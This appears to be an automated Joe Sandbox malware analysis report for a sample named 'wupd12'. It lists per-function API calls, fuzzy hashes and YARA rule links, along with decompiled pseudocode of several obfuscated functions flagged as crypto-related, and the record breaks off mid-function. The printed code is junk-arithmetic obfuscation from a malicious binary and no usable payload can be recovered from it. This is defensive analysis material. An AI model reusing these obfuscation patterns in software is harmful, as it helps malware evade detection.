Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: File$Write$Create$AllocCloseDirectoryHandleLocalMoveReadSizeVersionWindows_memmove_memset_strstr
String ID:
API String ID: 1638036530-0
Opcode ID: fc0c06aff71ba4935c2d1f67af77530d184c236ab055174dcd1e78c9eafde488
Instruction ID: 765ac3cb46463172b68dfa8292c2f44461038a9fef119033d6fa00fdfa5edc27
Opcode Fuzzy Hash: fc0c06aff71ba4935c2d1f67af77530d184c236ab055174dcd1e78c9eafde488
Instruction Fuzzy Hash: D8B1C47180028CEFDF25DFA4DC84BEE7BB8AB09304F04406AE959B7291D7799A44CB64

Uniqueness

Uniqueness Score: 100.00%

Function 00423849, Relevance: 21.8, APIs: 11, Strings: 1, Instructions: 756windowUNIQUE

Download Yara Rule

APIs

CloseHandle.KERNEL32(004015B3,00401594,?,?,?,00401561,?), ref: 004015A9
AdjustWindowRect.USER32(?,?,?,00401561,?), ref: 004015F3
DeferWindowPos.USER32(004239A0,0042383C,359D04E3,000002E5,00000000,00000000,0043A8E0,00000000,00000000,00000000), ref: 00423856
SelectPalette.GDI32(004238BE,004238C2,004239A0,0042383C,359D04E3,000002E5,00000000,00000000,0043A8E0,00000000,00000000,00000000), ref: 004238B4
DestroyWindow.USER32(004239A0,0042383C,359D04E3,000002E5,00000000,00000000,0043A8E0,00000000,00000000,00000000), ref: 004238E6

Strings

dll, xrefs: 00401BC8

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: Window$AdjustCloseDeferDestroyHandlePaletteRectSelect
String ID: dll
API String ID: 1478175520-1037284150
Opcode ID: 65d3e8a0856afdb4245f6b75cfcceafdb3841c4f81ec799c83834aa8e618293f
Instruction ID: c8f163150fd20f600cea62197386657aab34b0b25d93a6f327b6aa4aa6f2e44f
Opcode Fuzzy Hash: 65d3e8a0856afdb4245f6b75cfcceafdb3841c4f81ec799c83834aa8e618293f
Instruction Fuzzy Hash: AF52002164D3C08FC7268B689CA46A67FB0AF47315F0D45FBE4C19B2E3D22C5919D72A

Uniqueness

Uniqueness Score: 100.00%

Function 0042300D, Relevance: 13.8, APIs: 9, Instructions: 251memoryencryptionUNIQUE

Download Yara Rule

APIs

EqualDomainSid.ADVAPI32 ref: 00423053
AnimateWindow.USER32 ref: 00423090
HeapAlloc.KERNEL32 ref: 004230C3
TlsGetValue.KERNEL32 ref: 00423143
GetLastError.KERNEL32 ref: 0042318D
LookupAccountSidW.ADVAPI32(08D2F713), ref: 0042325C
CryptGenRandom.ADVAPI32 ref: 0042327D
LsaQueryTrustedDomainInfo.ADVAPI32 ref: 004232E8
AnimateWindow.USER32 ref: 00423321
LsaFreeMemory.ADVAPI32 ref: 004234CB

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: AnimateDomainWindow$AccountAllocCryptEqualErrorFreeHeapInfoLastLookupMemoryQueryRandomTrustedValue
String ID:
API String ID: 342342581-0
Opcode ID: 84762904fa57cad1c64adbaf942cd9056adef4fadb4a3d641a0d2756b6037611
Instruction ID: 4e2965cee942f84c167f9f7cc59165cbde7d4ca95485dd5490e3fa96c04f59c0
Opcode Fuzzy Hash: 84762904fa57cad1c64adbaf942cd9056adef4fadb4a3d641a0d2756b6037611
Instruction Fuzzy Hash: 7371702AA183E14BEB265F74AC9D1E63F70DB23322F9945E7C841476A3D50E0F47831A

Uniqueness

Uniqueness Score: 100.00%

Function 004C98D2, Relevance: 6.4, Strings: 5, Instructions: 105
UNIQUECrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004C98D2(void* __eax, void* __ebx, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				void* _t104;
				signed int _t112;
				signed int _t113;
				signed int _t114;

				_t113 = _t112 ^ 0x000084a4;
				_a8 = 0xada;
				 *(__ebx + 0x403388) =  *(__ebx + 0x403388) | _t113;
				E004C9A95(__eax + 0x4158 & 0x00000000 ^ 0x00000000, __ebx,  *((intOrPtr*)(__ebx + 0x40386c)));
				_v8 = _t104 - 0x733d + 1;
				_v8 = _v8 & 0x00000000;
				 *(__ebx + 0x403388) =  *(__ebx + 0x403388) + 1;
				 *(__ebx + 0x40338c) =  *(__ebx + 0x40338c) - 1;
				_a4 = 0;
				_v12 = 0x444f;
				 *(__ebx + 0x403388) =  *(__ebx + 0x403388) + 0xfe96;
				_t114 = _t113 - 0x8362;
				 *(__ebx + 0x40338c) =  *(__ebx + 0x40338c) | 0x0000de1a;
				 *(__ebx + 0x403388) =  *(__ebx + 0x403388) & 0x00002c64;
				E004CCB92(((0x10e0e | _v8) - 0x00005156 ^ 0x0000734c) - 0x00008396 & 0x00000000, __ebx,  *((intOrPtr*)(__ebx + 0x499354)),  *((intOrPtr*)(__ebx + 0x499350)),  *((intOrPtr*)(__ebx + 0x49934c)));
				_a12 = _a12 & _t114;
				_v8 = _v8 ^ 0x00000000;
				 *(__ebx + 0x403388) =  *(__ebx + 0x403388) ^ _t114 - 0x00000001;
				_v8 = _v8 & 0x00000000;
				_a8 = 0xc188;
				 *(__ebx + 0x40338c) =  *(__ebx + 0x40338c) ^ 0x00000000;
				_a4 = 0xcb47;
				_v8 = 0x6a24;
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 + 0xf143;
				_v8 = 0x5ade;
				 *(__ebx + 0x40338c) = 0xe02c;
				 *(__ebx + 0x40338c) =  *(__ebx + 0x40338c) - 1;
				_a8 = 0x88bb;
				_a4 = _a4 + 1;
				return E004CD22B(0xa8c2, __ebx,  *((intOrPtr*)(__ebx + 0x499348)),  *((intOrPtr*)(__ebx + 0x499344)),  *((intOrPtr*)(__ebx + 0x499340))) + 0x59ba;
			}

0x004c98e9
0x004c98fa
0x004c9901
0x004c9926
0x004c992b
0x004c993e
0x004c994d
0x004c9953
0x004c995b
0x004c995e
0x004c9981
0x004c99a4
0x004c99aa
0x004c99b0
0x004c99cc
0x004c99d1
0x004c99da
0x004c99e6
0x004c99ee
0x004c99fc
0x004c9a09
0x004c9a0f
0x004c9a16
0x004c9a2a
0x004c9a40
0x004c9a4a
0x004c9a4e
0x004c9a58
0x004c9a65
0x004c9a6c
0x004c9a92

Strings

d,, xrefs: 004C99B0
1, xrefs: 004C98E2
OD, xrefs: 004C995E
$j, xrefs: 004C9A16
,, xrefs: 004C9A4E

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: $j$,$1$OD$d,
API String ID: 0-158384954
Opcode ID: d83ed1634a85246476d7db78af29b8d52b049c37458ced604f74a4194514e437
Instruction ID: 96321b309bdd267ff81f12b978d98368cf6630cf7cc98a697577f603483955d5
Opcode Fuzzy Hash: d83ed1634a85246476d7db78af29b8d52b049c37458ced604f74a4194514e437
Instruction Fuzzy Hash: 50417372900304ABFB04CF64C98979A7BB5EB44316F14C17E9C08AE1C5DB7C8B15AF64

Uniqueness

Uniqueness Score: 100.00%

Function 004C6853, Relevance: 6.4, Strings: 5, Instructions: 103
UNIQUECrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004C6853(void* __eax, void* __ebx, void* __eflags, signed int _a4, signed int _a8, signed int _a12) {
				intOrPtr _v8;
				signed int _v12;
				signed int _t71;
				signed int _t78;
				signed int _t92;
				signed int _t93;
				signed int _t95;
				signed int _t118;
				void* _t120;
				void* _t121;
				signed int _t123;
				void* _t126;

				_a4 = _a4 ^ 0x00000000;
				_a4 = 0xfe9c;
				_t121 = _t120 + 1;
				_t71 = E004CCED8(0xb615, __ebx, __eflags,  *((intOrPtr*)(__ebx + 0x4993b8)));
				_v12 = _v12 - _t121;
				_a8 = _a8 + 0x682a;
				 *(__ebx + 0x4033f8) = 0x1e26;
				 *(__ebx + 0x4033f8) =  *(__ebx + 0x4033f8) | (_t95 ^ 0x00008da5) & 0x000001da;
				_t78 = E004CA565((_t71 & 0x00000000 ^ 0x00000000) + 0x00009e6b - 0x22ea & 0x0000a336, __ebx,  *((intOrPtr*)(__ebx + 0x4038f4)),  *((intOrPtr*)(__ebx + 0x4038f0)),  *((intOrPtr*)(__ebx + 0x4038ec)));
				_a12 = 0xb5cb;
				_t123 = _t121 - 0x00009f59 & 0x00000000;
				 *(__ebx + 0x4033fc) =  *(__ebx + 0x4033fc) + _t123;
				_v8 = _v8 - 1;
				 *(__ebx + 0x4033fc) =  *(__ebx + 0x4033fc) ^ 0x3a20;
				 *(__ebx + 0x4033f8) = 0x3621;
				_v12 = _v12 | 0x00003d7b;
				_t118 = (_t78 & 0 ^ 0x00009c55) - 0xffffffffffffee8f;
				 *(__ebx + 0x4033f8) = _t118;
				_a8 = _a8 & 0x00005c7c;
				 *(__ebx + 0x4033fc) =  *(__ebx + 0x4033fc) - _t118;
				 *(__ebx + 0x4033f8) =  *(__ebx + 0x4033f8) & 0x000094ac;
				_t126 = _t123 - 0xcba6 + _a12 - 1;
				_a4 = _a4 - 0x32f2;
				_t92 = E004C6A0D((((_t78 & 0 ^ 0x00009c55) - 0xffffffffffff74e6 ^  *(__ebx + 0x4033f8)) - 0x00000001 ^ 0xcdcc) + 0x0000e035 ^ 0x0000bf24, __ebx,  *((intOrPtr*)(__ebx + 0x4993bc)));
				_a8 = _a8 + _t126;
				_t93 = _t92 & 0x00000000;
				_a8 = _a8 | _t126 - 0x00000001;
				_a12 = _a12 | _t93;
				_v12 = _v12 + 0xa8de;
				return _t93;
			}

0x004c6860
0x004c6864
0x004c6880
0x004c688d
0x004c6892
0x004c6895
0x004c68ba
0x004c68ca
0x004c68f1
0x004c68f6
0x004c6914
0x004c6922
0x004c6938
0x004c693d
0x004c694e
0x004c6963
0x004c696a
0x004c6976
0x004c6987
0x004c69a7
0x004c69ad
0x004c69b7
0x004c69b8
0x004c69d8
0x004c69dd
0x004c69e0
0x004c69e6
0x004c69e9
0x004c69f2
0x004c6a0a

Strings

DA, xrefs: 004C698F
!6, xrefs: 004C694E
{=, xrefs: 004C6963
9{, xrefs: 004C6999
|\, xrefs: 004C6987

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: !6$9{$DA${=$|\
API String ID: 0-1043213060
Opcode ID: ede31830bd595e3414ff7e2899a44d31bd0c8b1da8f069c1f985807c2e373140
Instruction ID: f617bb68b9f1893aad59d3e47241c613c582cbcc56d72711de7b07bae914cc9c
Opcode Fuzzy Hash: ede31830bd595e3414ff7e2899a44d31bd0c8b1da8f069c1f985807c2e373140
Instruction Fuzzy Hash: 97419472910705AFFB048E25C88678A3BA5FF40315F19C17ABC189E5C5C77C8B519B94

Uniqueness

Uniqueness Score: 100.00%

Function 004C9A95, Relevance: 6.4, Strings: 5, Instructions: 101
UNIQUECrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004C9A95(void* __eax, void* __ebx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t82;
				void* _t87;
				void* _t105;
				signed int _t110;
				signed int _t111;
				signed int _t114;
				signed int _t116;
				void* _t123;

				_t111 = _t110 ^ _a4;
				_a4 = _a4 - 1;
				_a4 = _a4 + 1;
				_v12 = _v12 ^ _t111;
				 *(__ebx + 0x403518) =  *(__ebx + 0x403518) ^ _t116;
				_v8 = _v8 - 1;
				_a4 = _a4 - 0xb54f;
				 *(__ebx + 0x403518) =  *(__ebx + 0x403518) + 1;
				_a4 = _a4 ^ _t123 - __eax & 0x00001ac7;
				_v16 = _v16 | ((__eax + 0x00006bc8 ^ 0x00000000) + 0x0000a645 ^ 0x1d87) + 0x00008425;
				_t82 = E004C8B98(((__eax + 0x00006bc8 ^ 0x00000000) + 0x0000a645 ^ 0x1d87) + 0x8425, __ebx,  *((intOrPtr*)(__ebx + 0x4994b0)),  *((intOrPtr*)(__ebx + 0x4994ac)),  *((intOrPtr*)(__ebx + 0x4994a8)));
				 *(__ebx + 0x40351c) = 0x3a83;
				 *(__ebx + 0x403518) =  *(__ebx + 0x403518) + 0x6e56;
				_t87 = E004CDAE7((_t82 ^ 0x000057a4) & 0 ^ 0x000081e9, __ebx,  *((intOrPtr*)(__ebx + 0x4994b4)));
				_t114 = _t111 -  *(__ebx + 0x403518) + _v16 | _a4;
				_a4 = _a4 & _t114;
				 *(__ebx + 0x40351c) =  *(__ebx + 0x40351c) ^ 0x00000000;
				_a4 = _a4 | 0x0000a385;
				_a4 = _a4 + 1;
				_a4 = _a4 + 0x6a39;
				_v8 = _v8 - 1;
				 *(__ebx + 0x403518) =  *(__ebx + 0x403518) & _t105 + _a4 - 0x000021f3;
				_a4 = 0xf9e2;
				_v8 = _v8 & 0x0000dd94;
				_a4 = 0xf6ee;
				_a4 = _a4 | 0x00000c32;
				_v12 = _v12 - 0xab03;
				_a4 = _a4 ^ 0x0000bb72;
				_v12 = _v12 + 0x5f66;
				return (((((_t87 - 0x797e & 0x000068a2 ^ 0x0000cf85) + 0x00006948 & 0x0000b89f ^ 0x000027cf) - 0x00000983 & 0x000079ac ^ 0x00006f84) - (_t114 & 0x00004629) & 0x00009336) - 0x00000001 ^ 0x00008595) + 0x906f - 0x4e00;
			}

0x004c9aa0
0x004c9aa6
0x004c9aa9
0x004c9aac
0x004c9ab1
0x004c9acf
0x004c9ad8
0x004c9ae5
0x004c9af0
0x004c9afd
0x004c9b12
0x004c9b39
0x004c9b43
0x004c9b58
0x004c9b5d
0x004c9b60
0x004c9b63
0x004c9b6f
0x004c9b76
0x004c9b98
0x004c9bae
0x004c9bbb
0x004c9bc9
0x004c9be1
0x004c9be8
0x004c9bf4
0x004c9bfe
0x004c9c0c
0x004c9c13
0x004c9c38

Strings

f_, xrefs: 004C9C13
Vn, xrefs: 004C9B43
Z,, xrefs: 004C9B86
Z,o, xrefs: 004C9B36
o, xrefs: 004C9C2B

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: Vn$Z,$Z,o$f_$o
API String ID: 0-2195236122
Opcode ID: 7b0bf737630bdb4b8ff5a45ed50e80ad9c58e488bdb861515975a2ac90fafda6
Instruction ID: 8d1bef8a2ddf9de8c46b7fdf3b1f25fa6635ad97870878a87d4f351d302b8e42
Opcode Fuzzy Hash: 7b0bf737630bdb4b8ff5a45ed50e80ad9c58e488bdb861515975a2ac90fafda6
Instruction Fuzzy Hash: 8F418FB3820604BFFB048F60CC4679A3FB5FB50359F28C179AC0899095D77D8B958B94

Uniqueness

Uniqueness Score: 100.00%

Function 004C3CE1, Relevance: 5.1, Strings: 4, Instructions: 104
UNIQUECrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004C3CE1(void* __eax, void* __ebx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t98;
				void* _t108;
				signed int _t112;
				signed int _t117;
				signed int _t120;
				signed int _t121;
				void* _t123;
				signed int _t131;
				signed int _t133;
				void* _t136;
				signed int _t138;

				_a4 = _a4 - _t123;
				_v16 = _v16 - 0xc19f;
				 *(__ebx + 0x4033d8) =  *(__ebx + 0x4033d8) + 1;
				_a4 = _a4 | _t131;
				_a4 = _a4 + _t131;
				_a4 = _a4 + (__eax + 0x00008359 ^ 0x000080a7);
				 *(__ebx + 0x4033d8) =  *(__ebx + 0x4033d8) | 0x00009670;
				 *(__ebx + 0x4033dc) =  *(__ebx + 0x4033dc) | 0x0000bd3a;
				_v8 = _v8 ^ 0x00000000;
				_t98 = E004C9C3B((__eax + 0x00008359 ^ 0x000080a7) - 0x7886 + 1, __ebx, _a4 & __eax + 0x00008359,  *((intOrPtr*)(__ebx + 0x4038b4)));
				_v8 = _v8 | 0x0000a8bd;
				_v8 = _v8 - 1;
				_a4 = 0x90c6;
				_t138 = _t136 - 0xffffffffffffdd28;
				_t117 = _t98 - 0xb76c;
				_t133 = _t131 - 0x00000001 ^ 0x00000402;
				_v12 = _v12 ^ 0x00000000;
				E004C939D((_t98 - 0x0000b76c | 0x000022d0) - 0xffffffffffffcbaa ^ 0x0000c522, __ebx, _t117);
				_a4 = _a4 | 0x00005273;
				_t108 = E004C2F44(0, __ebx,  *((intOrPtr*)(__ebx + 0x4038b8))) + 1 - 0xd790;
				_a4 = _t133;
				_a4 = _a4 - 1;
				_a4 = _t133;
				_v12 = _v12 - _t108;
				 *(__ebx + 0x4033d8) =  *(__ebx + 0x4033d8) & 0x00000000;
				_t109 = _t108 - 0xd04c;
				_a4 = _a4 + 0xf9af;
				_v16 = _v16 + 0x662a;
				_a4 = _a4 & _t108 - 0x0000d04c;
				 *(__ebx + 0x4033d8) =  *(__ebx + 0x4033d8) | 0x0000eea2;
				_a4 = _a4 & 0x00006abe;
				 *(__ebx + 0x4033dc) =  *(__ebx + 0x4033dc) - 1;
				 *(__ebx + 0x4033d8) =  *(__ebx + 0x4033d8) ^ 0x0000003c;
				 *(__ebx + 0x4033dc) =  *(__ebx + 0x4033dc) & _t138;
				 *(__ebx + 0x4033d8) =  *(__ebx + 0x4033d8) + 1;
				_t112 = E004C2D84(_t109 & 0, __ebx, _t109 & 0 & _t133,  *((intOrPtr*)(__ebx + 0x4993a4)),  *((intOrPtr*)(__ebx + 0x4993a0)));
				 *(__ebx + 0x4033d8) =  *(__ebx + 0x4033d8) + 0x8ba4;
				_t120 = (_t117 ^ _t138) + 0x00003e3f | _a4;
				 *(__ebx + 0x4033dc) =  *(__ebx + 0x4033dc) ^ _t120;
				_a4 = _a4 | 0x000008f9;
				_t121 = _t120 - 0x3c96;
				_a4 = 0x16f9;
				_v16 = _v16 | _t121;
				_v16 = _v16 + 0xc102;
				 *(__ebx + 0x4033dc) =  *(__ebx + 0x4033dc) & _t121 & 0x00006f8b;
				return (_t112 ^ 0x0000c1b1) - _a4 ^ 0x000061c5;
			}

0x004c3cf2
0x004c3cf5
0x004c3d08
0x004c3d0e
0x004c3d11
0x004c3d19
0x004c3d1c
0x004c3d26
0x004c3d36
0x004c3d40
0x004c3d45
0x004c3d51
0x004c3d54
0x004c3d5c
0x004c3d64
0x004c3d66
0x004c3d77
0x004c3d86
0x004c3d8b
0x004c3db7
0x004c3dbd
0x004c3dc0
0x004c3dca
0x004c3dcd
0x004c3dd0
0x004c3dd7
0x004c3ddc
0x004c3de3
0x004c3dea
0x004c3df2
0x004c3dfc
0x004c3e0a
0x004c3e18
0x004c3e1f
0x004c3e2b
0x004c3e3d
0x004c3e47
0x004c3e51
0x004c3e63
0x004c3e70
0x004c3e77
0x004c3e7f
0x004c3e86
0x004c3e89
0x004c3e9b
0x004c3eb1

Strings

*f, xrefs: 004C3DE3
H, xrefs: 004C3EA1
:!, xrefs: 004C3DC3
<, xrefs: 004C3E18

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: *f$:!$<$H
API String ID: 0-2942298935
Opcode ID: 1edf471f0ce4092296f8ad598380b09071b1347093ce0cc2a423298c6375cdb8
Instruction ID: 93fb91591cea6e6a6cc7b98e41715079b021c2b4696544096adada06f5392b4d
Opcode Fuzzy Hash: 1edf471f0ce4092296f8ad598380b09071b1347093ce0cc2a423298c6375cdb8
Instruction Fuzzy Hash: B7419F71A10204AFFB048F65D4C969A3FB5EF40395F28C16EAC09AD0D6CBBC97958F94

Uniqueness

Uniqueness Score: 100.00%

Function 004C134E, Relevance: 5.1, Strings: 4, Instructions: 103
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C134E(signed int __eax, void* __ebx, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _t106;
				signed int _t108;
				signed int _t109;
				signed int _t112;
				signed int _t113;
				void* _t115;
				signed int _t118;
				signed int _t129;

				_v8 = 0x836c;
				_a12 = _a12 | _t106;
				_a12 = _a12 ^ 0x00000000;
				 *(__ebx + 0x403284) =  *(__ebx + 0x403284) | _t106;
				 *(__ebx + 0x403284) =  *(__ebx + 0x403284) - 1;
				_a12 = _a12 - 0x6532;
				 *(__ebx + 0x403284) =  *(__ebx + 0x403284) ^ (((__eax & 0x00008a0c) + 0x00002018 | 0x0000c462) & 0x00006d12) + 0x0000b3ae - 0x00000001;
				_a4 = _a4 + 1;
				 *(__ebx + 0x403280) =  *(__ebx + 0x403280) ^ 0x00000000;
				_a4 = _a4 + 1;
				_t108 = _t106 - 0x000009c8 & 0x00000000;
				_a4 = _a4 + 0x26a7;
				 *(__ebx + 0x403280) =  *(__ebx + 0x403280) + _t108;
				_t109 = _t108 + 1;
				_a8 = _a8 ^ _t109;
				_t118 = _t115 + _t115 + _v8 + 0x8c60;
				 *(__ebx + 0x403284) =  *(__ebx + 0x403284) | 0x0000449e;
				 *(__ebx + 0x403284) =  *(__ebx + 0x403284) + 1;
				_a8 = _a8 + 0x4c64;
				 *(__ebx + 0x403280) =  *(__ebx + 0x403280) | _t118;
				_v8 = _v8 ^ _t118;
				_t131 = _t129 & 0x00000000 ^ 0x00005025;
				 *(__ebx + 0x403280) =  *(__ebx + 0x403280) & 0x000060d6;
				_v8 = 0xba3c;
				 *(__ebx + 0x403280) =  *(__ebx + 0x403280) | 0x0000f30b;
				_t112 = _t109 + 0x0000e67f - 0x00000001 & (_t129 & 0x00000000 ^ 0x00005025);
				E004C6EF0((_a8 - 0x00000001 & 0x00002d31 ^ 0xf017) & 0x00002717, __ebx, _v8 & (_a8 - 0x00000001 & 0x00002d31 ^ 0xf017) & 0x00002717, _t129 & 0x00000000 ^ 0x00005025,  *((intOrPtr*)(__ebx + 0x4991d0)),  *((intOrPtr*)(__ebx + 0x4991cc)));
				_a4 = _a4 | _t112;
				 *(__ebx + 0x403284) =  *(__ebx + 0x403284) + 0x7d00;
				_t113 = _t112 | 0x00003eaf;
				_v8 = _t113;
				 *(__ebx + 0x403280) =  *(__ebx + 0x403280) + _t113;
				 *(__ebx + 0x403280) =  *(__ebx + 0x403280) - 0xee4d;
				_v8 = 0;
				_a4 = _a4 + 0x31e5;
				_v8 = _v8 & 0;
				return E004C6853(0xffffffffffff9bae, __ebx, 0x00000000 & (_t131 ^ _v8),  *((intOrPtr*)(__ebx + 0x403714)),  *((intOrPtr*)(__ebx + 0x403710)),  *((intOrPtr*)(__ebx + 0x40370c)));
			}

0x004c1359
0x004c1360
0x004c137c
0x004c1386
0x004c1397
0x004c13a6
0x004c13ad
0x004c13b3
0x004c13cf
0x004c13d6
0x004c13dc
0x004c13e0
0x004c13e7
0x004c13ed
0x004c13ee
0x004c13fd
0x004c140e
0x004c1418
0x004c141e
0x004c1425
0x004c142b
0x004c143a
0x004c1442
0x004c144c
0x004c145c
0x004c1475
0x004c1487
0x004c148c
0x004c148f
0x004c14ac
0x004c14b2
0x004c14b9
0x004c14bf
0x004c14c9
0x004c14d1
0x004c14d8
0x004c1506

Strings

2e, xrefs: 004C13A6
M, xrefs: 004C14BF
1, xrefs: 004C14D1
dL, xrefs: 004C141E

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: 2e$M$dL$1
API String ID: 0-438942340
Opcode ID: b46ee32f5c4989a0fa5be089d4258ec14c89c81bfe220aeff507bbd8bf64b4b4
Instruction ID: 945b27c63599d456834ec64049832f6182dffc74d3b113785e2afc40c4a2ed03
Opcode Fuzzy Hash: b46ee32f5c4989a0fa5be089d4258ec14c89c81bfe220aeff507bbd8bf64b4b4
Instruction Fuzzy Hash: 1041D0B2C11605ABFB488F11C84669A7B75FF50316F18C1BE9C09AD0C6C77D8724AB58

Uniqueness

Uniqueness Score: 100.00%

Function 004CD408, Relevance: 5.1, Strings: 4, Instructions: 100
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004CD408(void* __eax, void* __ebx, signed int _a4, signed int _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t93;
				signed int _t96;
				void* _t108;
				signed int _t127;
				signed int _t128;
				void* _t134;

				_t93 = __eax + 0x11c7;
				_a8 = _a8 & 0x00000000;
				_a8 = _a8 + 1;
				_v12 = _v12 | _t93;
				 *(__ebx + 0x403390) =  *(__ebx + 0x403390) | _t127;
				_v16 = 0xafe8;
				_t128 = _t127 | _t93;
				 *(__ebx + 0x403394) =  *(__ebx + 0x403394) - 0x28ac;
				 *(__ebx + 0x403394) =  *(__ebx + 0x403394) - 1;
				_v8 = _v8 + 1;
				_v16 = _v16 ^ _t128;
				 *(__ebx + 0x403394) =  *(__ebx + 0x403394) & 0x0000fd9d;
				_v12 = _v12 + 0x5cf3;
				_v16 = _v16 + 0xba1f;
				_v16 = _v16 & _t128;
				_v8 = _v8 ^ 0x0000673a;
				 *(__ebx + 0x403390) = _t134 - 0x6885;
				_a8 = _a8 - 1;
				 *(__ebx + 0x403394) =  *(__ebx + 0x403394) | 0x00002e38;
				_t96 = E004C633B(_t93 & 0x00000000 ^ 0x000048ad, __ebx,  *((intOrPtr*)(__ebx + 0x49935c)),  *((intOrPtr*)(__ebx + 0x499358)));
				_v12 = _v12 - 1;
				_v12 = _v12 + 1;
				_v12 = _v12 ^ 0x00000000;
				_v16 = _v16 + 0xf84;
				_v16 = _v16 | (_t96 & 0x00000000) - 0xffffffffffff8cea;
				_v8 = _v8 - 0xfb5d;
				_a4 = _a4 | 0x0000f476;
				 *(__ebx + 0x403390) =  *(__ebx + 0x403390) - 0xe328;
				_a8 = 0x9eb2;
				_v12 = _v12 + 0xf476;
				_t108 = E004CDAE7((0x0000f476 | _v12) - 0x0000bd90 ^ 0x00008555, __ebx,  *((intOrPtr*)(__ebx + 0x403870)));
				_v8 = 0x65da;
				 *(__ebx + 0x403394) =  *(__ebx + 0x403394) - 1;
				return _t108 - 0x0000531b ^ 0xf343;
			}

0x004cd413
0x004cd418
0x004cd41c
0x004cd41f
0x004cd422
0x004cd42b
0x004cd433
0x004cd435
0x004cd445
0x004cd450
0x004cd45e
0x004cd461
0x004cd467
0x004cd46e
0x004cd475
0x004cd47e
0x004cd486
0x004cd493
0x004cd498
0x004cd4b2
0x004cd4e4
0x004cd4e7
0x004cd4ea
0x004cd4f9
0x004cd500
0x004cd508
0x004cd51f
0x004cd527
0x004cd537
0x004cd548
0x004cd583
0x004cd58d
0x004cd599
0x004cd5b7

Strings

8., xrefs: 004CD498
:g, xrefs: 004CD47E
kR, xrefs: 004CD554
(, xrefs: 004CD527

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: ($8.$:g$kR
API String ID: 0-2427540956
Opcode ID: 4638374cc9b5da60a5c440ea65fdca317876276e27185268c0cba5f81c8dd3ea
Instruction ID: a6963d207b60a4b8ce87cae0df61984f252b1558f8dbaaee0d96a36e947c630e
Opcode Fuzzy Hash: 4638374cc9b5da60a5c440ea65fdca317876276e27185268c0cba5f81c8dd3ea
Instruction Fuzzy Hash: D941A332810604EBFB08CF65C98A29E7BB1FF4031AF14C1AEAC18AA585CB7C47259F54

Uniqueness

Uniqueness Score: 100.00%

Function 004C860B, Relevance: 5.1, Strings: 4, Instructions: 99
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004C860B(signed int __eax, void* __ebx, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _t96;
				void* _t117;
				void* _t123;
				signed int _t125;

				 *(__ebx + 0x4034a0) =  *(__ebx + 0x4034a0) | 0x00000556;
				 *(__ebx + 0x4034a0) =  *(__ebx + 0x4034a0) ^ 0x00001f73;
				_t125 = _t123 + 1;
				_v8 = _v8 ^ 0x0000d9f3;
				_a8 = _a8 + 1;
				_v8 = _v8 | 0x0000ed20;
				_v8 = (__eax & 0x0000c2de) - 0x7253;
				_v8 = _v8 - 1;
